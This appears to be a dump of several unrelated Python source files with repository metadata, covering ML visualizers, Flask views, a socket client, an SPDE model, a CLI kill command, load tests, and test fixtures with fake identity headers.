"The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."
)
# Instantiate the visualizer
visualizer = classification_report(
GaussianNB(),
train_features,
train_target,
test_features,
test_target,
support=True,
)
# Get the viz
fig = visualizer.fig
ax = visualizer.show()
fig.axes.append(ax)
# show the viz
st.write(fig)
# TODO download model, Download report
# TODO live predictions
def feature_correlation(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a feature correlation graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
target_string = st.selectbox("Select Target Column", df.columns,
key="selectbox-feature-correlation")
residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"]
feature_cols = st.multiselect("Select Modeling Features", residual_cols,
key="multiselect-feature-correlation",
default=residual_cols[:5])
if str(df[target_string].dtype) == "object":
method = 'mutual_info-classification'
else:
type_problem = st.selectbox("Select the type of problem",
['classification', 'regression'])
if type_problem == 'classification':
method = st.selectbox("Select the correlation method",
['mutual_info-classification', 'pearson'])
else:
method = st.selectbox("Select the correlation method",
['mutual_info-regression', 'pearson'])
try:
viz = FeatureCorrelation(method=method,
feature_names=feature_cols,
sort=True)
viz.fit(df[feature_cols], df[target_string])
fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation")
st.plotly_chart(fig)
    except Exception:
        st.warning("Verify the type of problem you selected")
def class_balance(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a class balance graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1)
visualizer = ClassBalance(labels = df[classes].unique())
visualizer.fit(df[classes])
st_yellowbrick(visualizer)
| 30.511765 | 389 | 0.614035 |
4c33dde47e4450a45e6aa5280d3a4d98189d8d33
| 14,566 |
py
|
Python
|
info/modules/admin/views.py
|
moonbria/test1
|
05893bd91d416ca4093e4619ede427434fa665cc
|
[
"MIT"
] | null | null | null |
info/modules/admin/views.py
|
moonbria/test1
|
05893bd91d416ca4093e4619ede427434fa665cc
|
[
"MIT"
] | null | null | null |
info/modules/admin/views.py
|
moonbria/test1
|
05893bd91d416ca4093e4619ede427434fa665cc
|
[
"MIT"
] | null | null | null |
from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import time
from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta
from . import admin_blu
| 28.729783 | 87 | 0.604696 |
4c3438c0b1046ec22f1ab42437a0d08677dfe6f2
| 2,839 |
py
|
Python
|
src/predict_model.py
|
Swati17293/outlet-prediction
|
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
|
[
"MIT"
] | 1 |
2020-10-28T00:05:31.000Z
|
2020-10-28T00:05:31.000Z
|
src/predict_model.py
|
Swati17293/outlet-prediction
|
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
|
[
"MIT"
] | null | null | null |
src/predict_model.py
|
Swati17293/outlet-prediction
|
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
|
[
"MIT"
] | 1 |
2021-12-09T14:36:54.000Z
|
2021-12-09T14:36:54.000Z
|
#Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
train_ans, anslist = [], []
if __name__ == "__main__":
main()
| 27.038095 | 89 | 0.534343 |
4c353955c991e91d2a8ac820fc6be7fa23bb7348
| 716 |
py
|
Python
|
tools/client.py
|
Alisa1114/yolov4-pytorch-1
|
5dd8768f2eef868c9ee4588818350d4e1b50b98f
|
[
"MIT"
] | null | null | null |
tools/client.py
|
Alisa1114/yolov4-pytorch-1
|
5dd8768f2eef868c9ee4588818350d4e1b50b98f
|
[
"MIT"
] | null | null | null |
tools/client.py
|
Alisa1114/yolov4-pytorch-1
|
5dd8768f2eef868c9ee4588818350d4e1b50b98f
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
from socket import *
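# client() is called below but not defined in this snippet; a minimal hedged
# sketch (host, port, and payload are assumptions drawn from the commented-out
# buffer at the bottom of the file):
def client(address='127.0.0.1', port=8080):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((address, port))
    request = ('POST /post HTTP/1.1\r\n'
               'Content-Type:application/json\r\n'
               '\r\n')
    sock.send(request.encode())
    print(sock.recv(4096).decode())
    sock.close()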
if __name__ == '__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = ":)"
| 25.571429 | 64 | 0.624302 |
4c35e02888592e1186585689132cd3d10b0f4a6d
| 13,039 |
py
|
Python
|
dapy/models/kuramoto_sivashinsky.py
|
hassaniqbal209/data-assimilation
|
ec52d655395dbed547edf4b4f3df29f017633f1b
|
[
"MIT"
] | 11 |
2020-07-29T07:46:39.000Z
|
2022-03-17T01:28:07.000Z
|
dapy/models/kuramoto_sivashinsky.py
|
hassaniqbal209/data-assimilation
|
ec52d655395dbed547edf4b4f3df29f017633f1b
|
[
"MIT"
] | 1 |
2020-07-14T11:49:17.000Z
|
2020-07-29T07:43:22.000Z
|
dapy/models/kuramoto_sivashinsky.py
|
hassaniqbal209/data-assimilation
|
ec52d655395dbed547edf4b4f3df29f017633f1b
|
[
"MIT"
] | 10 |
2020-07-14T11:34:24.000Z
|
2022-03-07T09:08:12.000Z
|
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramoto--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
    1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
       in dissipative media far from thermal equilibrium.
       Progress of Theoretical Physics, 55 (1976) pp. 356-369.
    2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
       flames I. Derivation of basic equations.
       Acta Astronautica, 4 (1977) pp. 1177-1206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
| 47.072202 | 88 | 0.666692 |
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c
| 553 |
py
|
Python
|
setup.py
|
Lif3line/myo-helper
|
7c71a3ee693661ddba0171545bf5798f46231b3c
|
[
"MIT"
] | null | null | null |
setup.py
|
Lif3line/myo-helper
|
7c71a3ee693661ddba0171545bf5798f46231b3c
|
[
"MIT"
] | null | null | null |
setup.py
|
Lif3line/myo-helper
|
7c71a3ee693661ddba0171545bf5798f46231b3c
|
[
"MIT"
] | null | null | null |
"""Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
      description='Utility functions for working with Myo Armband data',
author='Lif3line',
author_email='[email protected]',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 27.65 | 85 | 0.631103 |
4c3bcf54b28a72322eb20b3cefe8c6d28943d5e4
| 1,030 |
py
|
Python
|
demos/restful-users/index.py
|
karldoenitz/karlooper
|
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
|
[
"MIT"
] | 161 |
2016-05-17T12:44:07.000Z
|
2020-07-30T02:18:34.000Z
|
demos/restful-users/index.py
|
karldoenitz/karlooper
|
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
|
[
"MIT"
] | 6 |
2016-08-29T01:40:26.000Z
|
2017-12-29T09:20:41.000Z
|
demos/restful-users/index.py
|
karldoenitz/karlooper
|
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
|
[
"MIT"
] | 16 |
2016-06-27T02:56:54.000Z
|
2019-08-08T08:18:48.000Z
|
# -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| 23.409091 | 99 | 0.61165 |
4c3c325909dda45d25ada2b46ed9a46e19b99dfc
| 4,154 |
py
|
Python
|
temporal_transforms.py
|
LijiangLong/3D-ResNets-PyTorch
|
89d2cba0b52d55aaa834635a81c172bc38771cd3
|
[
"MIT"
] | null | null | null |
temporal_transforms.py
|
LijiangLong/3D-ResNets-PyTorch
|
89d2cba0b52d55aaa834635a81c172bc38771cd3
|
[
"MIT"
] | null | null | null |
temporal_transforms.py
|
LijiangLong/3D-ResNets-PyTorch
|
89d2cba0b52d55aaa834635a81c172bc38771cd3
|
[
"MIT"
] | null | null | null |
import random
import math
| 26.974026 | 115 | 0.590515 |
4c3c84ef8550fb8c1fe9332f31bf0fbd72087616
| 1,206 |
py
|
Python
|
cli/waiter/subcommands/kill.py
|
geofft/waiter
|
0e10cd497c2c679ea43231866d9f803c3fed5d77
|
[
"Apache-2.0"
] | null | null | null |
cli/waiter/subcommands/kill.py
|
geofft/waiter
|
0e10cd497c2c679ea43231866d9f803c3fed5d77
|
[
"Apache-2.0"
] | null | null | null |
cli/waiter/subcommands/kill.py
|
geofft/waiter
|
0e10cd497c2c679ea43231866d9f803c3fed5d77
|
[
"Apache-2.0"
] | null | null | null |
from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
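# Hedged usage sketch (invocation shape inferred from the parser above; the
# executable name is an assumption):
#
#     waiter kill my-token --timeout 60
#     waiter kill my-service-id --service-id --force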
| 46.384615 | 115 | 0.694859 |
4c3ccdaafeb79fdce0197fde1a5c4f83054573ab
| 3,338 |
py
|
Python
|
a2t/src/a2t.py
|
syeda-khurrath/fabric8-analytics-common
|
421f7e27869c5695ed73b51e6422e097aba00108
|
[
"Apache-2.0"
] | null | null | null |
a2t/src/a2t.py
|
syeda-khurrath/fabric8-analytics-common
|
421f7e27869c5695ed73b51e6422e097aba00108
|
[
"Apache-2.0"
] | 4 |
2019-05-20T08:27:47.000Z
|
2019-05-20T08:29:57.000Z
|
a2t/src/a2t.py
|
codeready-analytics/fabric8-analytics-common
|
a763c5534d601f2f40a0f02c02914c49ea23669d
|
[
"Apache-2.0"
] | 1 |
2020-10-05T21:12:44.000Z
|
2020-10-05T21:12:44.000Z
|
"""The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| 30.345455 | 90 | 0.65698 |
4c3d2c0aac2c057e54b3e25d8827904204518172
| 3,568 |
py
|
Python
|
riscv_ctg/ctg.py
|
Giri2801/riscv-ctg
|
a90e03f0856bbdd106c3f6d51815af94707e711e
|
[
"BSD-3-Clause"
] | null | null | null |
riscv_ctg/ctg.py
|
Giri2801/riscv-ctg
|
a90e03f0856bbdd106c3f6d51815af94707e711e
|
[
"BSD-3-Clause"
] | null | null | null |
riscv_ctg/ctg.py
|
Giri2801/riscv-ctg
|
a90e03f0856bbdd106c3f6d51815af94707e711e
|
[
"BSD-3-Clause"
] | null | null | null |
# See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
| 37.166667 | 114 | 0.626962 |
4c3e29e2ae1ab7be40f9cfea714aae230e6e4e54
| 2,146 |
py
|
Python
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 25 |
2021-04-28T02:51:26.000Z
|
2022-03-24T13:58:04.000Z
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 1 |
2022-03-03T23:33:41.000Z
|
2022-03-03T23:35:41.000Z
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 15 |
2021-05-30T01:35:20.000Z
|
2022-03-25T12:38:25.000Z
|
from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
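# add_time is called below but its definition is not included in this snippet;
# a hedged reconstruction consistent with the call signature (the MainTimer
# namedtuple above is left unused here, since the original wiring is unknown):
def add_time(start, duration, weekday=None):
    days_order = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',
                  'Friday', 'Saturday', 'Sunday']
    time_part, period = start.split()
    hours, minutes = (int(x) for x in time_part.split(':'))
    if period == 'PM' and hours != 12:
        hours += 12
    if period == 'AM' and hours == 12:
        hours = 0
    add_hours, add_minutes = (int(x) for x in duration.split(':'))
    total = hours * 60 + minutes + add_hours * 60 + add_minutes
    days, remainder = divmod(total, 24 * 60)
    new_hour, new_minute = divmod(remainder, 60)
    new_period = 'AM' if new_hour < 12 else 'PM'
    display_hour = new_hour % 12 or 12
    result = '{}:{:02d} {}'.format(display_hour, new_minute, new_period)
    if weekday:
        idx = (days_order.index(weekday.capitalize()) + days) % 7
        result += ', ' + days_order[idx]
    if days == 1:
        result += ' (next day)'
    elif days > 1:
        result += ' ({} days later)'.format(days)
    return result
# For example, add_time('10:00 AM', '54:00', 'Monday') yields
# '4:00 PM, Wednesday (2 days later)'.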
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30)
| 32.029851 | 102 | 0.592265 |
4c405ed31ecc4361eadac459e688c3b9b4ba7bba
| 225 |
py
|
Python
|
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| 37.5 | 52 | 0.888889 |
4c4211ba5dbc8c290d97362485169fd20badaf8a
| 816 |
py
|
Python
|
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | 1 |
2021-03-12T18:32:06.000Z
|
2021-03-12T18:32:06.000Z
|
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | null | null | null |
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| 23.314286 | 56 | 0.654412 |
4c43be0918680e081f3bcc9acc58506e39754d60
| 1,421 |
py
|
Python
|
setup.py
|
jerzydziewierz/typobs
|
15fa697386f5fb3a1df53b865557c338be235d91
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
jerzydziewierz/typobs
|
15fa697386f5fb3a1df53b865557c338be235d91
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
jerzydziewierz/typobs
|
15fa697386f5fb3a1df53b865557c338be235d91
|
[
"Apache-2.0"
] | null | null | null |
# setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
packages=find_packages(),
# metadata to display on PyPI
author="Jerzy Dziewierz",
author_email="[email protected]",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
)
| 36.435897 | 87 | 0.640394 |
4c43f28c0f9c6fae0da417c39d88b7b2698c63a6
| 5,775 |
py
|
Python
|
tests/fixtures.py
|
ehelms/system-baseline-backend
|
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
|
[
"Apache-2.0"
] | null | null | null |
tests/fixtures.py
|
ehelms/system-baseline-backend
|
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
|
[
"Apache-2.0"
] | null | null | null |
tests/fixtures.py
|
ehelms/system-baseline-backend
|
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
|
[
"Apache-2.0"
] | null | null | null |
"""
decoded AUTH_HEADER (newlines added for readability):
{
"identity": {
"account_number": "1234",
"internal": {
"org_id": "5678"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "Firstname",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Lastname",
"locale": "en_US",
"username": "test_username"
}
}
"entitlements": {
"smart_management": {
"is_entitled": true
}
}
}
"""
AUTH_HEADER = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1"
"Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl"
"bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz"
"dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl"
"Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf"
"b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi"
"TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz"
"ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50"
"aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50"
"IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg=="
}
AUTH_HEADER_NO_ENTITLEMENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij"
"EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl"
"cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi"
"J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6"
"IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW"
"1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt"
"aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG"
"9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn"
"X2lkIjoiNTY3OCJ9fX0KCg=="
}
AUTH_HEADER_SMART_MGMT_FALSE = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi"
"NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7"
"ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp"
"cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp"
"c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi"
"OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi"
"dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl"
"bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu"
"dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg=="
}
# this can't happen in real life, adding test anyway
AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf"
"aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1"
"c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv"
"bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp"
"c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0"
"cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0"
"X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu"
"X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l"
"In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu"
"YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9"
"fX0K"
}
"""
decoded AUTH_HEADER_NO_ACCT (newlines added for readability):
{
"identity": {
"internal": {
"org_id": "9999"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "No",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Number",
"locale": "en_US",
"username": "nonumber"
}
}
}
"""
AUTH_HEADER_NO_ACCT = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO"
"nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm"
"9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo"
"iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX"
"2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC"
"JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo="
}
BASELINE_ONE_LOAD = {
"baseline_facts": [
{"name": "arch", "value": "x86_64"},
{"name": "phony.arch.fact", "value": "some value"},
],
"display_name": "arch baseline",
}
BASELINE_TWO_LOAD = {
"baseline_facts": [
{"name": "memory", "value": "64GB"},
{"name": "cpu_sockets", "value": "16"},
],
"display_name": "cpu + mem baseline",
}
BASELINE_THREE_LOAD = {
"baseline_facts": [
{"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]}
],
"display_name": "cpu + mem baseline",
}
BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]}
BASELINE_PARTIAL_TWO = {
"display_name": "ABCDE",
"baseline_facts": [
{
"name": "hello",
"values": [
{"name": "nested_one", "value": "one"},
{"name": "nested_two", "value": "two"},
],
}
],
}
BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"}
CREATE_FROM_INVENTORY = {
"display_name": "created_from_inventory",
"inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa",
}
SYSTEM_WITH_PROFILE = {
"account": "9876543",
"bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb",
"created": "2018-01-31T13:00:00.100010Z",
"display_name": None,
"fqdn": None,
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
"insights_id": "00000000-28af-11e9-9ab0-c85b761454fa",
"ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"],
"mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"],
"rhel_machine_id": None,
"satellite_id": None,
"subscription_manager_id": "RHN Classic and Red Hat Subscription Management",
"system_profile": {
"salutation": "hi",
"system_profile_exists": False,
"installed_packages": [
"openssl-1.1.1c-2.fc30.x86_64",
"python2-libs-2.7.16-2.fc30.x86_64",
],
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
},
"tags": [],
"updated": "2018-01-31T14:00:00.500000Z",
}
avg_line_length: 31.557377 | max_line_length: 81 | alphanum_fraction: 0.66303

hexsha: 4c449a22ce009dfff20f9f81e80e2e5aae88a200 | size: 3,200 | ext: py | lang: Python
max_stars_repo: 2021-02-03/2.py @ Elfenreigen/MCM-2021-C-SJTU-Test (98e3b14dbe7bb0ab4a76245d14e4691050704ac9) | licenses: ["MIT"] | stars: 1 (2022-01-24T11:59:40.000Z to 2022-01-24T11:59:40.000Z)
max_issues_repo: 2021-02-03/2.py @ Elfenreigen/MCM-2021-C-SJTU-Test (98e3b14dbe7bb0ab4a76245d14e4691050704ac9) | licenses: ["MIT"] | issues: null
max_forks_repo: 2021-02-03/2.py @ Elfenreigen/MCM-2021-C-SJTU-Test (98e3b14dbe7bb0ab4a76245d14e4691050704ac9) | licenses: ["MIT"] | forks: null
#####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv

